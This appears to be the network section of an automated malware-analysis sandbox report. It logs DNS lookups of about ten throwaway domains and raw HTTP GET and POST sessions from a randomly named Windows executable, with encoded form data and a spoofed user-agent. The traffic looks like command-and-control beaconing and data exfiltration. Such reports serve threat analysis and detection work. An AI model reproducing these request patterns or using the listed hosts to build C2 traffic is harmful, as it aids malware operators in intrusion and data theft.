                                                                                            Oct 24, 2024 15:31:44.453191996 CEST8050015172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:44.453273058 CEST5001580192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:44.461519003 CEST5001580192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:44.466942072 CEST8050015172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:45.140120029 CEST8050015172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:45.142590046 CEST8050015172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:45.142817974 CEST5001580192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:45.146856070 CEST5001580192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:45.152214050 CEST8050015172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:50.186639071 CEST5001680192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:50.192075968 CEST8050016154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:50.192171097 CEST5001680192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:50.203567028 CEST5001680192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:50.208923101 CEST8050016154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:51.148569107 CEST8050016154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:51.240683079 CEST5001680192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:51.330604076 CEST8050016154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:51.330887079 CEST5001680192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:51.710803986 CEST5001680192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:52.914279938 CEST5001780192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:52.920082092 CEST8050017154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:52.920150042 CEST5001780192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:52.964663029 CEST5001780192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:52.970072985 CEST8050017154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:53.883109093 CEST8050017154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:53.928196907 CEST5001780192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:54.064547062 CEST8050017154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:54.064606905 CEST5001780192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:54.475110054 CEST5001780192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:55.536351919 CEST5001880192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:55.543826103 CEST8050018154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:55.543915987 CEST5001880192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:55.565495014 CEST5001880192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:55.570950985 CEST8050018154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:55.571286917 CEST8050018154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:56.509372950 CEST8050018154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:56.561388969 CEST5001880192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:56.690690041 CEST8050018154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:56.690793991 CEST5001880192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:57.085799932 CEST5001880192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:58.103262901 CEST5001980192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:58.108685970 CEST8050019154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:58.109756947 CEST5001980192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:58.118626118 CEST5001980192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:58.124989033 CEST8050019154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:59.072458982 CEST8050019154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:59.147020102 CEST5001980192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:59.254182100 CEST8050019154.23.181.7192.168.2.5
                                                                                            Oct 24, 2024 15:31:59.254796028 CEST5001980192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:59.255491018 CEST5001980192.168.2.5154.23.181.7
                                                                                            Oct 24, 2024 15:31:59.260837078 CEST8050019154.23.181.7192.168.2.5
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 24, 2024 15:29:41.471669912 CEST5197753192.168.2.51.1.1.1
                                                                                            Oct 24, 2024 15:29:41.491646051 CEST53519771.1.1.1192.168.2.5
                                                                                            Oct 24, 2024 15:29:57.245058060 CEST4938353192.168.2.51.1.1.1
                                                                                            Oct 24, 2024 15:29:57.262806892 CEST53493831.1.1.1192.168.2.5
                                                                                            Oct 24, 2024 15:30:11.042159081 CEST6033353192.168.2.51.1.1.1
                                                                                            Oct 24, 2024 15:30:11.054642916 CEST53603331.1.1.1192.168.2.5
                                                                                            Oct 24, 2024 15:30:24.432712078 CEST6047553192.168.2.51.1.1.1
                                                                                            Oct 24, 2024 15:30:24.462061882 CEST53604751.1.1.1192.168.2.5
                                                                                            Oct 24, 2024 15:30:37.745908976 CEST5219853192.168.2.51.1.1.1
                                                                                            Oct 24, 2024 15:30:38.068131924 CEST53521981.1.1.1192.168.2.5
                                                                                            Oct 24, 2024 15:30:56.589592934 CEST6199453192.168.2.51.1.1.1
                                                                                            Oct 24, 2024 15:30:56.740057945 CEST53619941.1.1.1192.168.2.5
                                                                                            Oct 24, 2024 15:31:10.119693041 CEST5815553192.168.2.51.1.1.1
                                                                                            Oct 24, 2024 15:31:10.133342028 CEST53581551.1.1.1192.168.2.5
                                                                                            Oct 24, 2024 15:31:23.463300943 CEST5220453192.168.2.51.1.1.1
                                                                                            Oct 24, 2024 15:31:23.476783037 CEST53522041.1.1.1192.168.2.5
                                                                                            Oct 24, 2024 15:31:36.792500973 CEST6323653192.168.2.51.1.1.1
                                                                                            Oct 24, 2024 15:31:36.805159092 CEST53632361.1.1.1192.168.2.5
                                                                                            Oct 24, 2024 15:31:50.162257910 CEST6007353192.168.2.51.1.1.1
                                                                                            Oct 24, 2024 15:31:50.184149981 CEST53600731.1.1.1192.168.2.5
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Oct 24, 2024 15:29:41.471669912 CEST192.168.2.51.1.1.10xeda8Standard query (0)www.ila.beautyA (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:29:57.245058060 CEST192.168.2.51.1.1.10xc671Standard query (0)www.shintow.netA (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:11.042159081 CEST192.168.2.51.1.1.10x3881Standard query (0)www.mireela.proA (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:24.432712078 CEST192.168.2.51.1.1.10x3136Standard query (0)www.micrhyms.infoA (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:37.745908976 CEST192.168.2.51.1.1.10x9d6Standard query (0)www.estrela-b.onlineA (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:56.589592934 CEST192.168.2.51.1.1.10x10e3Standard query (0)www.meanttobebroken.orgA (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:10.119693041 CEST192.168.2.51.1.1.10x561cStandard query (0)www.mjmegartravel.onlineA (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:23.463300943 CEST192.168.2.51.1.1.10x4feStandard query (0)www.energyparks.netA (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:36.792500973 CEST192.168.2.51.1.1.10x4aeStandard query (0)www.theawareness.shopA (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:50.162257910 CEST192.168.2.51.1.1.10x4178Standard query (0)www.ak711ka10.latA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Oct 24, 2024 15:29:41.491646051 CEST1.1.1.1192.168.2.50xeda8No error (0)www.ila.beauty13.248.169.48A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:29:41.491646051 CEST1.1.1.1192.168.2.50xeda8No error (0)www.ila.beauty76.223.54.146A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:29:57.262806892 CEST1.1.1.1192.168.2.50xc671No error (0)www.shintow.netghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Oct 24, 2024 15:29:57.262806892 CEST1.1.1.1192.168.2.50xc671No error (0)ghs.googlehosted.com142.250.185.115A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:11.054642916 CEST1.1.1.1192.168.2.50x3881No error (0)www.mireela.pro69.57.163.227A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:24.462061882 CEST1.1.1.1192.168.2.50x3136No error (0)www.micrhyms.infomicrhyms.infoCNAME (Canonical name)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:24.462061882 CEST1.1.1.1192.168.2.50x3136No error (0)micrhyms.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:24.462061882 CEST1.1.1.1192.168.2.50x3136No error (0)micrhyms.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:38.068131924 CEST1.1.1.1192.168.2.50x9d6No error (0)www.estrela-b.onlineestrela-b.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:38.068131924 CEST1.1.1.1192.168.2.50x9d6No error (0)estrela-b.online162.241.63.77A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:56.740057945 CEST1.1.1.1192.168.2.50x10e3No error (0)www.meanttobebroken.org141.193.213.11A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:30:56.740057945 CEST1.1.1.1192.168.2.50x10e3No error (0)www.meanttobebroken.org141.193.213.10A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:10.133342028 CEST1.1.1.1192.168.2.50x561cNo error (0)www.mjmegartravel.onlinemjmegartravel.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:10.133342028 CEST1.1.1.1192.168.2.50x561cNo error (0)mjmegartravel.online76.223.67.189A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:10.133342028 CEST1.1.1.1192.168.2.50x561cNo error (0)mjmegartravel.online13.248.213.45A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:23.476783037 CEST1.1.1.1192.168.2.50x4feNo error (0)www.energyparks.netenergyparks.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:23.476783037 CEST1.1.1.1192.168.2.50x4feNo error (0)energyparks.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:23.476783037 CEST1.1.1.1192.168.2.50x4feNo error (0)energyparks.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:36.805159092 CEST1.1.1.1192.168.2.50x4aeNo error (0)www.theawareness.shop172.67.177.220A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:36.805159092 CEST1.1.1.1192.168.2.50x4aeNo error (0)www.theawareness.shop104.21.83.154A (IP address)IN (0x0001)false
                                                                                            Oct 24, 2024 15:31:50.184149981 CEST1.1.1.1192.168.2.50x4178No error (0)www.ak711ka10.lat154.23.181.7A (IP address)IN (0x0001)false
                                                                                            • www.ila.beauty
                                                                                            • www.shintow.net
                                                                                            • www.mireela.pro
                                                                                            • www.micrhyms.info
                                                                                            • www.estrela-b.online
                                                                                            • www.meanttobebroken.org
                                                                                            • www.mjmegartravel.online
                                                                                            • www.energyparks.net
                                                                                            • www.theawareness.shop
                                                                                            • www.ak711ka10.lat
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.54986613.248.169.48803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:29:41.512497902 CEST411OUTGET /qq33/?pZxtux=i6Dk+UJVjxglEXs09Tl/1hzZ7yI7sWOV9FpOihhS4ziFAzHmIjfzFnYav8OQcpUvdMfWm2GXI1cxWM9gtNVnhTwiButew2EOfjMP80SRQHDkyyZg6sD1yMmsAnC5II4onw==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.ila.beauty
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:29:42.174063921 CEST403INHTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Thu, 24 Oct 2024 13:29:42 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 263
                                                                                            Connection: close
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 5a 78 74 75 78 3d 69 36 44 6b 2b 55 4a 56 6a 78 67 6c 45 58 73 30 39 54 6c 2f 31 68 7a 5a 37 79 49 37 73 57 4f 56 39 46 70 4f 69 68 68 53 34 7a 69 46 41 7a 48 6d 49 6a 66 7a 46 6e 59 61 76 38 4f 51 63 70 55 76 64 4d 66 57 6d 32 47 58 49 31 63 78 57 4d 39 67 74 4e 56 6e 68 54 77 69 42 75 74 65 77 32 45 4f 66 6a 4d 50 38 30 53 52 51 48 44 6b 79 79 5a 67 36 73 44 31 79 4d 6d 73 41 6e 43 35 49 49 34 6f 6e 77 3d 3d 26 43 36 3d 45 58 6b 54 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pZxtux=i6Dk+UJVjxglEXs09Tl/1hzZ7yI7sWOV9FpOihhS4ziFAzHmIjfzFnYav8OQcpUvdMfWm2GXI1cxWM9gtNVnhTwiButew2EOfjMP80SRQHDkyyZg6sD1yMmsAnC5II4onw==&C6=EXkTb"}</script></head></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.549949142.250.185.115803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:29:57.283437014 CEST673OUTPOST /ow7i/ HTTP/1.1
                                                                                            Host: www.shintow.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.shintow.net
                                                                                            Referer: http://www.shintow.net/ow7i/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 63 33 30 6e 55 61 59 65 6e 52 4e 4b 6e 38 2f 72 58 6d 64 35 67 6d 65 70 45 4a 34 33 71 6d 64 4f 4b 63 2f 6d 30 43 4c 41 63 6b 69 53 56 75 50 41 2b 52 32 67 42 4b 2b 70 6c 64 6c 75 6e 78 52 43 58 57 66 48 52 6e 31 51 4f 75 46 37 76 6d 47 6b 61 75 4c 70 61 74 52 66 48 75 4d 31 58 62 6b 53 34 68 62 4b 36 69 6f 44 4c 48 73 39 78 71 64 67 4c 64 42 7a 4c 5a 46 5a 51 63 42 5a 63 54 4e 65 31 49 2f 70 6a 39 50 67 41 71 38 53 34 71 72 36 6a 68 46 47 2f 46 33 58 45 6b 5a 77 4c 4d 64 51 2b 51 31 63 47 35 61 52 72 57 52 34 64 50 2f 4a 54 35 31 45 62 44 71 44 50 41 3d
                                                                                            Data Ascii: pZxtux=O4lQUcptNkK6uc30nUaYenRNKn8/rXmd5gmepEJ43qmdOKc/m0CLAckiSVuPA+R2gBK+pldlunxRCXWfHRn1QOuF7vmGkauLpatRfHuM1XbkS4hbK6ioDLHs9xqdgLdBzLZFZQcBZcTNe1I/pj9PgAq8S4qr6jhFG/F3XEkZwLMdQ+Q1cG5aRrWR4dP/JT51EbDqDPA=
                                                                                            Oct 24, 2024 15:29:58.218060017 CEST401INHTTP/1.1 301 Moved Permanently
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 24 Oct 2024 13:29:58 GMT
                                                                                            Location: https://www.shintow.net/ow7i/
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.549964142.250.185.115803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:29:59.823642969 CEST693OUTPOST /ow7i/ HTTP/1.1
                                                                                            Host: www.shintow.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.shintow.net
                                                                                            Referer: http://www.shintow.net/ow7i/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 34 4c 30 6c 33 69 59 66 48 52 4d 46 48 38 2f 68 33 6d 5a 35 67 71 65 70 46 39 6f 32 5a 43 64 4f 6f 55 2f 33 46 43 4c 44 63 6b 69 61 31 76 4c 64 4f 52 39 67 42 50 42 70 67 39 6c 75 6e 6c 52 43 53 53 66 48 6d 7a 30 43 75 75 44 79 50 6d 49 71 36 75 4c 70 61 74 52 66 47 4b 69 31 57 7a 6b 53 4a 52 62 4c 62 69 72 41 4c 48 76 74 68 71 64 72 72 64 46 7a 4c 5a 37 5a 55 64 4a 5a 65 72 4e 65 32 63 2f 73 69 39 51 31 77 71 41 66 59 72 4a 2b 53 4d 42 45 4e 59 35 51 57 52 78 6b 49 30 72 52 49 68 66 47 6b 78 79 43 4c 36 70 6f 4f 48 49 59 6a 59 63 65 34 54 61 64 59 57 72 54 35 38 37 38 4e 77 57 78 2f 72 48 51 78 66 6e 53 36 75 68
                                                                                            Data Ascii: pZxtux=O4lQUcptNkK6u4L0l3iYfHRMFH8/h3mZ5gqepF9o2ZCdOoU/3FCLDckia1vLdOR9gBPBpg9lunlRCSSfHmz0CuuDyPmIq6uLpatRfGKi1WzkSJRbLbirALHvthqdrrdFzLZ7ZUdJZerNe2c/si9Q1wqAfYrJ+SMBENY5QWRxkI0rRIhfGkxyCL6poOHIYjYce4TadYWrT5878NwWx/rHQxfnS6uh
                                                                                            Oct 24, 2024 15:30:00.762973070 CEST401INHTTP/1.1 301 Moved Permanently
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 24 Oct 2024 13:30:00 GMT
                                                                                            Location: https://www.shintow.net/ow7i/
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.549978142.250.185.115803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:02.413759947 CEST1710OUTPOST /ow7i/ HTTP/1.1
                                                                                            Host: www.shintow.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.shintow.net
                                                                                            Referer: http://www.shintow.net/ow7i/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 34 4c 30 6c 33 69 59 66 48 52 4d 46 48 38 2f 68 33 6d 5a 35 67 71 65 70 46 39 6f 32 5a 4b 64 4f 64 41 2f 6c 57 61 4c 4d 38 6b 69 47 6c 76 47 64 4f 52 61 67 41 72 4e 70 67 35 54 75 6b 64 52 42 77 61 66 42 58 7a 30 4a 75 75 44 74 66 6d 46 6b 61 75 6b 70 61 39 56 66 48 36 69 31 57 7a 6b 53 4b 35 62 50 4b 69 72 50 72 48 73 39 78 71 5a 67 4c 64 39 7a 4c 42 72 5a 55 52 5a 5a 4f 4c 4e 64 57 4d 2f 72 41 6c 51 33 51 71 34 63 59 72 76 2b 53 41 4f 45 4e 46 49 51 53 51 61 6b 49 4d 72 64 75 73 38 44 56 38 73 42 61 57 35 6c 64 58 46 47 57 6f 6e 65 71 6a 77 58 4c 69 36 62 74 34 56 78 59 4d 35 35 2f 69 78 53 56 2b 33 62 36 4c 4a 63 77 33 33 54 34 56 4d 69 69 37 35 37 36 4b 2b 66 36 53 54 32 4e 32 39 67 66 58 44 43 6d 4f 68 62 62 54 44 42 4c 79 4b 44 43 56 70 75 77 48 35 2f 72 41 72 4f 31 4e 6e 5a 30 34 62 4c 39 72 49 58 4a 47 52 68 33 2f 49 56 4a 76 6d 79 6a 73 63 38 79 6e 46 63 70 32 33 55 6e 2b 53 54 51 4a 55 36 46 4d 43 31 4b 4c 4c 61 72 57 38 42 6d 55 [TRUNCATED]
                                                                                            Data Ascii: pZxtux=O4lQUcptNkK6u4L0l3iYfHRMFH8/h3mZ5gqepF9o2ZKdOdA/lWaLM8kiGlvGdORagArNpg5TukdRBwafBXz0JuuDtfmFkaukpa9VfH6i1WzkSK5bPKirPrHs9xqZgLd9zLBrZURZZOLNdWM/rAlQ3Qq4cYrv+SAOENFIQSQakIMrdus8DV8sBaW5ldXFGWoneqjwXLi6bt4VxYM55/ixSV+3b6LJcw33T4VMii7576K+f6ST2N29gfXDCmOhbbTDBLyKDCVpuwH5/rArO1NnZ04bL9rIXJGRh3/IVJvmyjsc8ynFcp23Un+STQJU6FMC1KLLarW8BmUkyGUoNLiyTf38hHJkWVo1+6BXUpvk4mQiX6yoHryTZrYV2W3rxok5zAH30XZVBde9tjrFdTLs44IlgHk+qpCVh/Z+PZZwDLoRHOeEUa3MKnWW/5Yx9YyLM4V0EMjsKxeIJmDTnqwsN/GP6QMMfoDqyAwH+gh0yIrydykV++3ZI2z2k/fIxWgQU90UnOSoCizQZuW/hON5ae1m8FPkPP88LQqjKrzRhDWopXXk5P3EKcXVvwTZ8vzci6hyJdauEe85zaYRqsCCbslDRjL2n5dY9Hlmpcq5uonl4e4qkTxiXUZie7D+v8Fr+fVOLh/ZhoQlZdaw9fR4JBVRXiGfQdQQGEy25K/R8ryX7uxslZVjjku28kUyY95899nWDoBKLrYOE+ENpZy2Eyv62GAdp+0SyEi7/7VmmNvcl2TL7pW9T5kOGWZEZAljT0feqgS5IvAsj5r32OnDTjMIz2MYmegpEi9cXEKsppppBe6vU6Itq1wjJtwSeBAysrKx0FTWmu8FES5YzEo99phGS6KudWUdoOiHGt1TWUBTz+o0zwKzbObXJGlHRdlF/V4Nq4JV5bs6erAKDn9xaHdgvFNbeGRu9lwJISipSughYmmtu2juc7UEvyUgNotQ+25HVZWuw0tjgUwgNFgx43x09LUQlFKoGtVvhVjN2CAmt [TRUNCATED]
                                                                                            Oct 24, 2024 15:30:03.346499920 CEST401INHTTP/1.1 301 Moved Permanently
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 24 Oct 2024 13:30:03 GMT
                                                                                            Location: https://www.shintow.net/ow7i/
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.549986142.250.185.115803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:04.961354017 CEST412OUTGET /ow7i/?pZxtux=D6NwXqVIZVbqudPbukfKSXslB0cDplrj7EaXwER037qfX6kPuWmDYfQvQA/Ze+QTmkPK0wpsgEVRbQCYLV+GBPPQtbW1nqz4pZ5COE7r30blXJdgErW3TYP6jwHTnZcx3A==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.shintow.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:05.905431032 CEST554INHTTP/1.1 301 Moved Permanently
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 24 Oct 2024 13:30:05 GMT
                                                                                            Location: https://www.shintow.net/ow7i/?pZxtux=D6NwXqVIZVbqudPbukfKSXslB0cDplrj7EaXwER037qfX6kPuWmDYfQvQA/Ze+QTmkPK0wpsgEVRbQCYLV+GBPPQtbW1nqz4pZ5COE7r30blXJdgErW3TYP6jwHTnZcx3A%3D%3D&C6=EXkTb
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.54998769.57.163.227803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:11.073523045 CEST673OUTPOST /mdol/ HTTP/1.1
                                                                                            Host: www.mireela.pro
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mireela.pro
                                                                                            Referer: http://www.mireela.pro/mdol/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
